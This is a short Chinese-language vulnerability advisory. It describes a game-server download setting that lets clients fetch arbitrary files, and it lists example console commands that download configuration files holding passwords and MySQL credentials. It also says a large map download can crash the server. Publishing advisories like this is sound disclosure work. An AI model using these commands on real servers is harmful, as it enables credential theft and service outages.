在服务器配置里，如果allowdownload = 1，则可以从当前游戏的目录或服务器里的/valve目录里下载任何文件,allowdownload的功能是允许客户端从服务器上下载新的地图。这个漏洞可用来下载包括密码等带有敏感信息的配置文件（比如server.cfg,不同mods的配置文件），另外，下载大的文件（比如地图）可导致服务器的崩溃。

攻击方法：
示例代码：
cmd dlfile server.cfg
cmd dlfile addons/amx/users.ini
cmd dlfile addons/amx/mysql.cfg
cmd dlfile maps/de_torn.bsp

解决方案：
目前厂商未公布该缺陷补丁，请及时关注厂商公告

附加信息：
无